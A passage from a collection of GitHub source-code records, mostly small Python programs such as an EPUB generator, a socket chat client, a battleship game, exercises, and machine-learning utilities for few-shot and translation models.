ToolchainInstaller\n\n def __init__(self):\n self._toolchain_installer = ToolchainInstaller(None, None)\n\n def install_toolchain(self, toolchain: Toolchain, path: str = \"\") -> Self:\n '''\n Specify the toolchain to be installed\n '''\n\n self._toolchain_installer.toolchain = toolchain\n self._toolchain_installer.install_path = path\n return self\n\n def install_additional_tools(self, install: bool = False) -> Self:\n '''\n Specify whether to install additional utility tools acoompanied with\n the toolchain\n '''\n\n self._toolchain_installer.additional_tools = install\n return self\n\n def distribution(self, distribution: Distribution) -> Self:\n '''\n Specify the distribution\n '''\n\n self._toolchain_installer.distribution = distribution\n return self\n\n def build(self) -> ToolchainInstaller:\n '''\n Return the constructed installer\n '''\n\n return self._toolchain_installer\n","repo_name":"nnishant776/project_generator","sub_path":"src/project_generator/lib/toolchain_manager/installer/_installer.py","file_name":"_installer.py","file_ext":"py","file_size_in_byte":8725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18176191284","text":"#!/usr/bin/python3\n#\n# date: 12.26.2017\n# by: keith crowder\n# name: magicians.v3.py\n#\n# exercise 8-11, used solution\n# https://ehmatthes.github.io/pcc/solutions/chapter_8.html#8-10-great-magicians\n#\ndef show_magicians(magicians):\n for magician in magicians:\n print(magician.title())\n\ndef make_great(magicians):\n#\n great_magicians = []\n#\n while magicians:\n magician = magicians.pop()\n great_magician = magician + \" the Great!\"\n great_magicians.append(great_magician)\n#\n for great_magician in great_magicians:\n magicians.append(great_magician)\n\n return magicians\n#\nmagicians = ['bob', 'bill','brenda']\nshow_magicians(magicians)\n#\nprint(\"\\nGreat magicians:\")\ngreat_magicians = make_great(magicians[:])\nshow_magicians(great_magicians)\n#\nprint(\"\\nOriginal magicians:\")\nshow_magicians(magicians)\n#\n# end of program\n#\n","repo_name":"kcrowder/python","sub_path":"magicians.v3.py","file_name":"magicians.v3.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20274918521","text":"#!/usr/bin/python3\n\"\"\"Defines a class named \"Square\" that represents a square.\nThe class inherits from the \"Rectangle\" class, which means\nit inherits the attributes and methods of the Rectangle\nclass and adds its own specific functionality for squares\n\nThe constructor (__init__) initializes a new Square object with\nthe provided size, x-coordinate, y-coordinate, and id. It\ncalls the parent class's constructor (super()\nThis ensures that the Square is initialized as a special case\nof a Rectangle with equal width and height.\n\nThe size property provides a getter and setter for the size\nattribute of the square. It maps the size attribute to\nthe width attribute of the underlying Rectangle.\n\nThe update method allows updating the attributes of the\nsquare using either positional arguments or keyword arguments.\nIt checks if positional arguments (args) or keyword arguments (kwargs)\nare provided and updates the corresponding attributes accordingly.\n\nThe to_dictionary method returns a dictionary representation of\nthe square, containing its attributes (id, size, x, and y).It leverages\nthe parent class's width attribute to represent the size.\n\nThe __str__ method provides a string representation of the square\nthat can be used with the print function or str function. It\ndisplays the square's id, x and y coordinates, and size\n(which is mapped to the width attribute).\n\n\"\"\"\n\n\nfrom models.rectangle import Rectangle\n\n\nclass Square(Rectangle):\n \"\"\"Represent a square.\"\"\"\n\n def __init__(self, size, x=0, y=0, id=None):\n \"\"\"Initialize a new Square.\n\n Args:\n size (int): The size of the new Square.\n x (int): The x coordinate of the new Square.\n y (int): The y coordinate of the new Square.\n id (int): The identity of the new Square.\n \"\"\"\n super().__init__(size, size, x, y, id)\n\n @property\n def size(self):\n \"\"\"Get/set the size of the Square.\"\"\"\n return self.width\n\n @size.setter\n def size(self, value):\n self.width = value\n self.height = value\n\n def update(self, *args, **kwargs):\n \"\"\"Update the Square.\n\n Args:\n *args (ints): New attribute values.\n - 1st argument represents id attribute\n - 2nd argument represents size attribute\n - 3rd argument represents x attribute\n - 4th argument represents y attribute\n **kwargs (dict): New key/value pairs of attributes.\n \"\"\"\n if args and len(args) != 0:\n a = 0\n for arg in args:\n if a == 0:\n if arg is None:\n self.__init__(self.size, self.x, self.y)\n else:\n self.id = arg\n elif a == 1:\n self.size = arg\n elif a == 2:\n self.x = arg\n elif a == 3:\n self.y = arg\n a += 1\n\n elif kwargs and len(kwargs) != 0:\n for k, v in kwargs.items():\n if k == \"id\":\n if v is None:\n self.__init__(self.size, self.x, self.y)\n else:\n self.id = v\n elif k == \"size\":\n self.size = v\n elif k == \"x\":\n self.x = v\n elif k == \"y\":\n self.y = v\n\n def to_dictionary(self):\n \"\"\"Return the dictionary representation of the Square.\"\"\"\n return {\n \"id\": self.id,\n \"size\": self.width,\n \"x\": self.x,\n \"y\": self.y\n }\n\n def __str__(self):\n \"\"\"Return the print() and str() representation of a Square.\"\"\"\n return \"[Square] ({}) {}/{} - {}\".format(self.id, self.x, self.y,\n self.width)\n","repo_name":"AmazedWonder/alx-higher_level_programming","sub_path":"0x0C-python-almost_a_circle/models/square.py","file_name":"square.py","file_ext":"py","file_size_in_byte":3904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"69968137426","text":"import os\nimport numpy as np\nimport pandas as pd\n\nimport torch\nfrom data_utils import *\nfrom infer_utils import *\nfrom one_shot_model import *\n\n\nclass DummyArgs:\n embed_dim = 200\n hidden_dim = 256\n hidden_layers = 3\n\n\ndef run():\n data_formatter = DataFormatter()\n train, test = data_formatter.get_data()\n print('Train distirubtion')\n print(pd.Series([i[0] for i in train]).value_counts())\n print('Test distribution')\n print(pd.Series([i[0] for i in test]).value_counts())\n\n args = DummyArgs()\n\n model_path = '/data/users/kyle.shaffer/wm/oneshot_models/stacked_one_shot_model.pt'\n model = SiameseNet(vocab_size=data_formatter.vocab_size, args=args)\n model.load_state_dict(torch.load(model_path))\n print('Model loaded...')\n\n predictor = OneshotPredictor(model=model, train_set=train, test_set=test[:10000])\n print( predictor.comparison_labels)\n predictor.run_eval()\n\n\nif __name__ == '__main__':\n os.environ['CUDA_VISIBLE_DEVICES'] = '0'\n run()","repo_name":"kylejshaffer/few_shot_text","sub_path":"src/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"71431715666","text":"from hundir import func_random\r\nfrom hundir import jugador1\r\nfrom hundir import jugador2\r\nfrom hundir import coloca_jugador1\r\nfrom hundir import coloca_maquina\r\n\r\n##'¡El juego empieza aqui!'!##\r\nprint(\"¡Que empiece el juego!\")\r\nprint()\r\nimport time\r\nturno = 1\r\n\r\nfunc_random(input(\"Nombre 1:\"),\"Maquina\")\r\nprint()\r\nprint(\"Coloca jugador 1\"\"\\n\")\r\ncoloca_jugador1()\r\nprint()\r\nprint(\"Coloca jugador 2\"\"\\n\")\r\ncoloca_maquina()\r\n\r\n\r\nwhile \"#\" in jugador1.tablero1.values or \"#\" in jugador2.tablero2.values:\r\n\r\n print(\"Turno:\", turno)\r\n time.sleep(1)\r\n print(\"Ataca el jugador 1\")\r\n jugador1.atacar(jugador2)\r\n print(\"Ataca el jugador 2\")\r\n jugador2.atacar(jugador1)\r\n turno = turno + 1\r\n print(\"---------\")\r\n\r\nelse:\r\n if \"#\" in jugador1.tablero1.values:\r\n print(\"¡Gana el jugador 1!\")\r\n elif \"#\" in jugador2.tablero2.values:\r\n print(\"¡Gana el jugador 2!\")\r\n else:\r\n \"GAME OVER, caputto\"\r\n","repo_name":"Beceiro21/Hundir-la-flota","sub_path":"batalla_naval.py","file_name":"batalla_naval.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40754321611","text":"class Solution(object):\n def getLongestPath2(self, filesys):\n list = filesys.splitlines() # Parse the string into list\n st = [0] # to add the path separator before root dir\n lastLevel = -1 # depth of the last item in st\n sum = 0\n for item in list:\n print(item)\n bareName = item.lstrip(' ') # Strip leading '\\t's\n curLevel = len(item) - len(bareName) # Use number of '\\t's to find level\n while (curLevel <= lastLevel): # cd .. to the same level as \"item\"\n st.pop()\n lastLevel -= 1\n st.append(len(bareName) + st[-1] + 1) # accumulated length, +1 for path-sep\n lastLevel = curLevel\n if ('.' in item): # Only count \"files\" with an extension\n sum += st[-1]\n print(\"#\", st, curLevel, sum)\n return sum\n\n def getLongestPath(self, S):\n list = S.splitlines()\n seperator_array = [0]\n last_level = -1\n maximum_length = 0\n for item in list:\n print(item)\n fs_name = item.lstrip(' ')\n current_level = len(item) - len(fs_name)\n while current_level <= last_level:\n seperator_array.pop()\n last_level -= 1\n seperator_array.append(len(fs_name) + seperator_array[-1] + 1)\n last_level = current_level\n if '.jpeg' in item or '.png' in item or '.gif' in item:\n maximum_length = max(maximum_length, seperator_array[-2])\n print(\"#\", seperator_array, current_level, maximum_length)\n return maximum_length\n\nmySol = Solution()\nprint(mySol.getLongestPath(\"d1\\n d2\\n d4\\nd3\\n t.png\\nd3\\n t.png\"))","repo_name":"udaykd09/Algorithms","sub_path":"FileSystem.py","file_name":"FileSystem.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"14624654160","text":"# list of possible charts in the format:\n# {python function name} : {js class}, {js package}\nCHARTS_TYPES = {\n 'geochart' : ('GeoChart', 'geochart'),\n 'linechart' : ('LineChart', 'corechart')\n}\n\nclass ChartFunctionGenerator(object):\n '''Generator of the funcions that is used to draw\n charts of different types.'''\n \n def __init__(self, wrapped_module):\n self.wrapped_module = wrapped_module\n \n def __getattr__(self, name):\n charts = self.wrapped_module.charts\n if name in CHARTS_TYPES:\n class_name, package = CHARTS_TYPES[name]\n return charts.generate_chart_function(class_name, [package])\n else:\n raise AttributeError(name)","repo_name":"floreskul/pygchart","sub_path":"function_generator.py","file_name":"function_generator.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13011103537","text":"#! /usr/bin/env python3\nimport sys\nimport logging\nimport os.path\nimport hashlib\nimport argparse\n\nimport requests\nimport dhtmlparser\nfrom ebooklib import epub\n\nPROJECT_URL = \"https://github.com/Bystroushaak/meaningness.com_epub_generator\"\n\n\nlogger = logging.getLogger(\"convertor\")\nstderr_logger = logging.StreamHandler(sys.stderr)\nstderr_logger.setFormatter(logging.Formatter(\n \"%(asctime)s %(levelname)s: %(message)s\"\n))\nlogger.addHandler(stderr_logger)\nlogger.setLevel(logging.DEBUG)\n\n\nclass BookGenerator:\n \"\"\"\n Just to keep track about chapters, automatically generate table of contents\n and so on.\n \"\"\"\n def __init__(self, title):\n self.book = epub.EpubBook()\n self.title = title\n self.chapters = []\n self.toc = []\n\n self.book.set_title(self.title)\n\n def generate_ebook(self, path):\n self._add_css()\n self._add_toc()\n\n epub.write_epub(path, self.book, {})\n\n def set_language(self, lang):\n return self.book.set_language(lang)\n\n def add_metadata(self, namespace, name, value, others=None):\n return self.book.add_metadata(namespace, name, value, others)\n\n def add_chapter(self, chapter):\n self.book.add_item(chapter)\n self.chapters.append(chapter)\n\n def add_image(self, image):\n self.book.add_item(image)\n\n def add_author(self, author):\n self.book.add_author(author)\n\n def _add_toc(self):\n if self.toc:\n self.book.toc = self.toc\n else:\n self.book.toc = (\n (epub.Section(self.title),\n self.chapters),\n )\n\n self.book.add_item(epub.EpubNcx())\n self.book.add_item(epub.EpubNav())\n\n self.book.spine = ['nav'] + self.chapters\n\n def _add_css(self):\n # define CSS style\n style = 'BODY {color: white;}'\n nav_css = epub.EpubItem(\n uid=\"style_nav\",\n file_name=\"style/nav.css\",\n media_type=\"text/css\",\n content=style\n )\n\n self.book.add_item(nav_css)\n\n\nclass MeaningnessEbook:\n def __init__(self, html_root, tmp_path):\n self.tmp_path = tmp_path\n\n self.html_root = html_root\n self.book = BookGenerator('Meaningness')\n\n self.book.add_author('David Chapman')\n self.book.set_language('en')\n self.book.add_metadata('DC', 'date', \"2020-01-27\")\n self.book.add_metadata('DC', 'generator', '', {'name': 'generator',\n 'content': PROJECT_URL})\n\n self.chapters_metadata = list(self.parse_book_contents(html_root))\n\n path_chapter_map = {}\n for article_path, chapter_fn in self.chapters_metadata:\n chapter = self.convert_chapter(article_path, chapter_fn)\n self.book.add_chapter(chapter)\n path_chapter_map[article_path] = chapter\n\n self.book.toc = self.parse_toc(path_chapter_map)\n\n def parse_book_contents(self, html_root):\n logger.info(\"Parsing book contents..\")\n\n with open(os.path.join(html_root, \"index.html\")) as f:\n index_html = f.read()\n\n index_dom = dhtmlparser.parseString(index_html)\n toc_dom = index_dom.find(\"nav\", {\"class\": \"book-tree\"})[0]\n for a_el in toc_dom.find(\"a\"):\n href = a_el.params[\"href\"]\n yield (href, href)\n\n def parse_toc(self, path_chapter_map):\n logger.info(\"Parsing TOC structure from index.html..\")\n\n with open(os.path.join(self.html_root, \"index.html\")) as f:\n index_html = f.read()\n\n index_dom = dhtmlparser.parseString(index_html)\n toc_dom = index_dom.find(\"nav\", {\"class\": \"book-tree\"})[0]\n\n def process(toc_dom):\n li_structure = []\n for li in toc_dom.wfind(\"li\").childs:\n if li.params.get(\"class\", \"\") == \"\":\n sub_chapters = process(li.find(\"ul\")[0])\n last_li = li_structure.pop()\n li_structure.append([last_li, sub_chapters])\n else:\n href = li.find(\"a\")[0].params[\"href\"]\n li_structure.append(path_chapter_map[href])\n\n return li_structure\n\n return process(toc_dom)\n\n def convert_chapter(self, article_path, chapter_fn, title=None):\n logger.info(\"Converting %s\", article_path)\n\n full_path = os.path.join(self.html_root, article_path)\n if os.path.isdir(full_path):\n raise ValueError(full_path)\n\n with open(full_path) as f:\n dom = dhtmlparser.parseString(f.read())\n\n if not title:\n title = dom.find(\"title\")[0].getContent()\n title = title.replace(\" | Meaningness\", \"\", 1)\n\n body = dom.find(\"body\")[0]\n\n self.remove_fluff(body)\n self._inline_images(body, article_path)\n\n chapter = epub.EpubHtml(title=title, file_name=chapter_fn)\n chapter.content = body.getContent()\n\n return chapter\n\n def remove_fluff(self, body):\n empty = dhtmlparser.parseString(\"\")\n\n def replace(selector):\n for el in selector:\n el.replaceWith(empty)\n\n replace(body.find(\"div\", {\"class\": \"nocontent\"}))\n replace(body.find(\"div\", {\"class\": \"tertiary-content-wrapper\"}))\n replace(body.find(\"div\", {\"class\": \"more-link\"}))\n replace(body.find(\"div\", {\"class\": \"view-content\"}))\n replace(body.find(\"div\", {\"class\": \"block-content content\"}))\n replace(body.find(\"div\", {\"class\": \"region region-content-aside\"}))\n replace(body.find(\"div\", {\"role\": \"search\"}))\n replace(body.find(\"div\", {\"class\": \"comment_bubble_wrapper\"}))\n replace(body.find(\"div\", fn=lambda x: \"block-meaningness-navigation\" in x.params.get(\"class\", \"\")))\n replace(body.find(\"header\"))\n replace(body.find(\"footer\"))\n replace(body.find(\"div\", {\"id\": \"tertiary-content-wrapper\"}))\n replace(body.find(\"nav\", {\"class\": \"clearfix\"}))\n\n return body.find(\"main\")[0]\n\n def _inline_images(self, body, article_path):\n for img in body.find(\"img\"):\n src = img.params[\"src\"]\n\n if src.startswith(\"../\"):\n src = src.replace(\"../\", \"\")\n\n try:\n if src.startswith(\"http://\") or src.startswith(\"https://\"):\n epub_img = self._inline_remote_image(src)\n else:\n epub_img = self._inline_local_image(img, src)\n except IOError:\n continue\n\n self.book.add_image(epub_img)\n\n root = \"\"\n if \"/\" in article_path:\n root = \"../\"\n img.params[\"src\"] = root + epub_img.file_name\n\n\n def _inline_remote_image(self, src):\n epub_img = epub.EpubImage()\n\n digest = hashlib.sha256(src.encode(\"utf-8\")).hexdigest()\n digest_name = \"{}.{}\".format(digest, src.rsplit(\".\")[-1])\n epub_img.file_name = os.path.join(self.tmp_path, digest_name)\n\n if not os.path.exists(epub_img.file_name):\n logger.info(\"Downloading remote image %s\", src)\n\n resp = requests.get(src)\n with open(epub_img.file_name, \"wb\") as f:\n f.write(resp.content)\n\n logger.info(\"Remote image %s added as %s\", src, epub_img.file_name)\n\n return epub_img\n\n def _inline_local_image(self, img, src):\n epub_img = epub.EpubImage()\n epub_img.file_name = src\n\n image_path = os.path.join(self.html_root, src)\n if not os.path.exists(image_path):\n logger.error(\"File %s doesn't exists, skipping!\", image_path)\n raise IOError(\"Can't open %s\" % image_path, image_path)\n\n with open(image_path, \"rb\") as f:\n epub_img.content = f.read()\n\n if \"style\" in img.params:\n del img.params[\"style\"]\n\n logger.info(\"Local image %s added\", epub_img.file_name)\n\n return epub_img\n\n def generate_ebook(self, path):\n return self.book.generate_ebook(path)\n\n\ndef put_ebook_together(html_path):\n tmp_name = \"tmp_images\"\n\n if not os.path.exists(tmp_name):\n os.mkdir(tmp_name)\n\n book = MeaningnessEbook(html_path, tmp_name)\n book.generate_ebook('meaningness.epub')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"PATH\",\n help=\"Path to the directory with the blog section about Self.\"\n )\n args = parser.parse_args()\n\n put_ebook_together(args.PATH)\n","repo_name":"Bystroushaak/meaningness.com_epub_generator","sub_path":"make.py","file_name":"make.py","file_ext":"py","file_size_in_byte":8521,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"13620829612","text":"import common_function\n\nif __name__ == \"__main__\":\n\titem_user_dict = common_function.read_item_user_dict(\"../data/repo_package_train.txt\")\n\ttop_20_items = sorted(item_user_dict.iteritems(), key=lambda d:len(d[1]), reverse = True)[:20]\n\tpackage_id_name_dict = common_function.read_dict(\"../data/package_dict.txt\")\n\twriter = open(\"recommendation_result_most_popular.txt\", \"wb\")\n\tfor i in range(0, 20):\n\t\twriter.write(package_id_name_dict[top_20_items[i][0]])\n\t\tif i != 19:\n\t\t\twriter.write('\\t')\n\t\telse:\n\t\t\twriter.write('\\n')\n","repo_name":"pangjac/JediGit","sub_path":"model/most_popular.py","file_name":"most_popular.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72728976785","text":"import random\n\ncapitals_dict = {\"Alabama\": \"Montgomery\", \"Alaska\": \"Juneau\", \"Arizona\": \"Phoenix\",\n \"Arkansas\": \"Little Rock\", \"California\": \"Sacramento\", \"Colorado\": \"Denver\",\n \"Connecticut\": \"Hartford\", \"Delaware\": \"Dover\", \"Florida\": \"Tallahassee\",\n \"Georgia\": \"Atlanta\", \"Hawaii\": \"Honolulu\", \"Idaho\": \"Boise\", \"Illinois\": \"Springfield\",\n \"Indiana\": \"Indianapolis\", \"Iowa\": \"Des Moines\", \"Kansas\": \"Topeka\",\n \"Kentucky\": \"Frankfort\", \"Louisiana\": \"Baton Rouge\", \"Maine\": \"Augusta\",\n \"Maryland\": \"Annapolis\", \"Massachusetts\": \"Boston\", \"Michigan\": \"Lansing\",\n \"Minnesota\": \"Saint Paul\", \"Mississippi\": \"Jackson\", \"Missouri\": \"Jefferson City\",\n \"Montana\": \"Helena\", \"Nebraska\": \"Lincoln\", \"Nevada\": \"Carson City\",\n \"New Hampshire\": \"Concord\", \"New Jersey\": \"Trenton\", \"New Mexico\": \"Santa Fe\",\n \"NewYork\": \"Albany\", \"North Carolina\": \"Raleigh\", \"North Dakota\": \"Bismarck\",\n \"Ohio\": \"Columbus\", \"Oklahoma\": \"Oklahoma City\", \"Oregon\": \"Salem\",\n \"Pennsylvania\": \"Harrisburg\", \"Rhode Island\": \"Providence\", \"SouthCarolina\": \"Columbia\",\n \"South Dakota\": \"Pierre\", \"Tennessee\": \"Nashville\", \"Texas\": \"Austin\",\n \"Utah\": \"Salt Lake City\", \"Vermont\": \"Montpelier\", \"Virginia\": \"Richmond\",\n \"Washington\": \"Olympia\", \"WestVirginia\": \"Charleston\", \"Wisconsin\": \"Madison\",\n \"Wyoming\": \"Cheyenne\"}\n\n\ndef main():\n num_correct = 0\n num_wrong = 0\n while True:\n # for item in capitals_dict:\n # print(\"|STATE:| {} |CAPITAL:| {}\".format(item, capitals_dict[item]))\n\n rand_state = random.choice(list(capitals_dict.keys()))\n user_capital = input(f\"\\nWhat is the capital of {rand_state}: \").lower()\n\n # Random state answer\n if rand_state in capitals_dict:\n print(capitals_dict.get(rand_state))\n\n if user_capital == capitals_dict.get(rand_state).lower():\n num_correct += 1\n print(f\"User answer {user_capital} is correct\"\n f\"\\ncorrect total: {num_correct}\")\n else:\n num_wrong += 1\n print(f\"wrong answer\"\n f\"\\nincorrect total: {num_wrong}\")\n\n replay_code = input(\"Try again? (y/n): \")\n if replay_code.lower() != \"y\":\n break\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Dudi1896/PycharmProjects","sub_path":"Lab8/state_capitals.py","file_name":"state_capitals.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30525698916","text":"#Libraries required\nimport socket#for sockets\nimport select#gives the IO capabilities irrespective os OS\nimport errno #for handling specific errors\nimport sys #for control over the terminal\nHEADER_LENGTH = 10#header length\n\n#Ip and Port numebr\nIP = \"127.0.0.1\"\nPORT = 1234\n#Grab the client username\nmyUsername = input(\"Enter your Username : \")\nclient_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)#Socket object\nclient_socket.connect((IP,PORT))#Connect it to the server\nclient_socket.setblocking(False) #This allows the reciev functionality working\n\nusername = myUsername.encode('utf-8')\nusername_header = f\"{len(username):<{HEADER_LENGTH}}\".encode('utf-8')\nclient_socket.send(username_header+username)\n\nwhile True:\n\t#Sending things\n\tmessage=input(f\"{myUsername} > \")\n\tif message:\n\t\tmessage = message.encode('utf-8')\n\t\tmessage_header = f\"{len(message):<{HEADER_LENGTH}}\".encode('utf-8')\n\t\tclient_socket.send(message_header+message)\n\n\ttry:\n\t\twhile True:\n\t\t\t#Receive things\n\t\t\tusername_header = client_socket.recv(HEADER_LENGTH)\n\t\t\tif not len(username_header):\n\t\t\t\tprint(\"Connection lost by the server\")\n\t\t\t\tsys.exit()\n\t\t\tusername_length = int(username_header.decode('utf-8').strip())\n\t\t\tusername = client_socket.recv(username_length).decode('utf-8')\n\t\t\tmessage_header = client_socket.recv(HEADER_LENGTH)\n\t\t\tmessage_length = int(message_header.decode('utf-8').strip())\n\t\t\tmessage = client_socket.recv(message_length).decode('utf-8')\n\t\t\tprint(f\"{username} > {message}\")\n\n\texcept IOError as e:\n\t\tif e.errno != errno.EAGAIN and e.errno != erno.EWOULDBLOCK:\n\t\t\tprint('Reading error',str(e))\n\t\t\tsys.exit()\n\t\t\n\texcept Exception as e:\n\t\tprint('General Error',str(e))\n\t\tpass\n\n\n","repo_name":"Chaitanya-Varun/Sockets","sub_path":"ChatClient.py","file_name":"ChatClient.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24702303381","text":"while True:\n try:\n frase = ' '.join(input('Digite uma frase: ').strip().lower().split())\n if len(frase) == 0:\n raise KeyError\n except:\n print('\\033[1;31mOcorreu um erro!\\033[m')\n else:\n print(f'''{frase.title()}\nA letra A aparece {frase.count('a')} vezes na frase\nA primeira letra A aparece na posição {frase.find('a')+1 if frase.find('a') != -1 else 'xx'}\nA última letra A aparece na posição {frase.rfind('a')+1 if frase.rfind('a') != -1 else 'xx'}\n''')\n break\n","repo_name":"HanatielVargas/Atividades-Python","sub_path":"Curso em Vídeo/Ex 026/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29375446697","text":"# encoding=utf-8\nimport os\n\nimport torch\n\n\ndef get_dep_mat(all_head, mask, dtype=torch.long):\n \"\"\"\n 1. don't have the dependency relation. ==> don't have the head node.\n 2. has the \"itself\" relation.\n 3. mask only for token.\n \"\"\"\n batch_size, tgt_len = all_head.shape\n\n flat_all_head = all_head.view(-1)\n add = torch.arange(0, batch_size * tgt_len * tgt_len, tgt_len).to(all_head.device)\n flat_all_head = flat_all_head + add\n same = add + torch.arange(0, tgt_len).repeat(batch_size).to(all_head.device)\n dep_mat = all_head.new_zeros((batch_size, tgt_len, tgt_len), dtype=dtype).fill_(0)\n\n dep_mat = dep_mat.view(-1)\n dep_mat[flat_all_head] = 1 # dependency relation\n\n if mask is not None:\n dep_mat = dep_mat.view(batch_size, tgt_len, tgt_len)\n dep_mat.masked_fill_(~mask.unsqueeze(-1), 0)\n dep_mat.masked_fill_(~mask.unsqueeze(-2), 0)\n\n dep_mat = dep_mat.view(-1)\n\n # dep_mat[same] = 1 # diag relation\n dep_mat = dep_mat.view(batch_size, tgt_len, tgt_len)\n if mask is not None:\n eye_mat = torch.eye(tgt_len, tgt_len).cuda().bool().unsqueeze(0).repeat(batch_size, 1, 1)\n eye_mat.masked_fill_(mask.unsqueeze(-1), False)\n eye_mat.masked_fill_(mask.unsqueeze(-2), False)\n dep_mat.masked_fill_(eye_mat, 1)\n\n # 对称\n mask_1 = dep_mat == 1\n mask_1 = mask_1.transpose(-1, -2)\n dep_mat.masked_fill_(mask_1, 1)\n\n return dep_mat\n\n\ndef load_dependency_head_tree(tree_path):\n dependency_list = []\n print(tree_path)\n with open(tree_path, \"r\") as f:\n for line in f:\n heads = line.strip().split(',')\n c = [int(i) for i in heads] # contain the bos and eos token\n dependency_list.append(c)\n\n return dependency_list\n\n\nDependencyFileMapping = {\n \"iwslt14_deen_distill\": \"/home/wangdq/dependency/iwslt16-deen/\",\n \"wmt14_ende_distill\": \"/home/data_ti5_c/wangdq/new/nat/dependency/wmt14_ende_distill\"\n}\n\n\nclass Tree():\n def __init__(self, valid_subset=\"valid\", dep_file=\"\", **kwargs):\n dir_name = self.get_file_dir(dep_file)\n\n if valid_subset != \"test\":\n self.train_tree = load_dependency_head_tree(os.path.join(dir_name, \"train.tree\"))\n else:\n self.train_tree = None\n\n self.valid_tree = load_dependency_head_tree(os.path.join(dir_name, valid_subset + \".tree\"))\n\n def get_file_dir(self, dep_file):\n return DependencyFileMapping.get(dep_file, \"\")\n\n def get_sentences(self, index_list, training):\n tree = self.train_tree if training else self.valid_tree\n return [tree[id] for id in index_list]\n\n\nclass ParentRelationMat():\n def __init__(self, valid_subset=\"valid\", dep_file=\"\", **kwargs):\n tree = Tree(valid_subset, dep_file)\n self.train_mat = self.process_mat(tree.train_tree)\n self.valid_mat = self.process_mat(tree.valid_tree)\n\n def process_mat(self, tree):\n if tree is None or len(tree) <= 0:\n return None\n result = []\n for sample_id, head in enumerate(tree):\n head = torch.LongTensor(head)\n dep_mat = get_dep_mat(head.unsqueeze(0), None, dtype=torch.uint8).squeeze(0)\n result.append(dep_mat)\n\n return result\n\n def get_relation_mat(self, sample_ids, reference, training=True):\n batch_size, seq_len = reference.size()\n dep_tensor = torch.eye(seq_len, seq_len).repeat(batch_size, 1, 1).to(reference)\n mask = reference.ne(1) # pad == 1\n dep_tensor.masked_fill_(mask.unsqueeze(-1), 0)\n dep_tensor.masked_fill_(mask.unsqueeze(-2), 0)\n\n mat = self.train_mat if training else self.valid_mat\n relations = [mat[id] for id in sample_ids]\n for index, relation in enumerate(relations):\n length, _ = relation.size()\n dep_tensor[index][:length, :length] = relation.long()\n\n return dep_tensor\n","repo_name":"wangqi1996/inter-nat","sub_path":"inter_nat/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":3952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19627935945","text":"\nimport math\nfrom utils import Input, printResult\nfrom intcode import Intcode\n\n# https://adventofcode.com/2019/day/11\n\ninput = Input(2019, 11).lines()[0]\n\ndef runWith(code):\n queue = [code]\n if code == 1:\n queue = [1] + [0] * 1000000\n robot = Intcode(input, queue).run()\n field = {}\n p = (0, 0)\n d = 0\n dirs = {0: [-1, 0], 1: [0, 1], 2: [1, 0], 3: [0, -1]}\n while True:\n color = next(robot, None)\n if color is None:\n break\n field[p] = color\n d = (d - 1 + next(robot) * 2) % 4\n p = (p[0] + dirs[d][0], p[1] + dirs[d][1])\n queue.append(field.get(p, 0))\n return field\n\nfield = runWith(0)\nprintResult(1, len(field))\n\nfield = runWith(1)\nminy = min(p[0] for p in field)\nmaxy = max(p[0] for p in field)\nminx = min(p[1] for p in field)\nmaxx = max(p[1] for p in field)\n\nid = \"\"\npalette = {0: \" \", 1: \"@@\"}\nfor y in range(miny, maxy+1):\n id += \"\\n\" + \"\".join(\n palette[field.get((y, x), 0)]\n for x in range(minx, maxx+1))\n\nprintResult(2, id)\n","repo_name":"Zefick/Advent-of-Code","sub_path":"src/Python/2019/Day11.py","file_name":"Day11.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35255106125","text":"import re\n\n\ndef log_parser(filename: str):\n with open(filename, \"r\") as f:\n lines = f.readlines()\n\n points = []\n for line in lines:\n finds = re.findall(\"Position\\(x=(\\d+\\.\\d+), y=(\\d+\\.\\d+)\", line)\n if finds:\n points.append(tuple(map(float, reversed(finds[0]))))\n\n return points\n","repo_name":"somamvp/voyager-ml-server","sub_path":"log_gps_parser.py","file_name":"log_gps_parser.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"12635743479","text":"from turtle import Turtle\nimport random\n\n\nclass Food(Turtle):\n def __init__(self):\n super().__init__()\n self.shape(\"circle\")\n self.color(\"white\")\n self.penup()\n self.shapesize(stretch_wid=0.5, stretch_len=0.5)\n self.speed(\"fastest\")\n self.refresh()\n\n def refresh(self):\n rand_x = random.randint(-270, 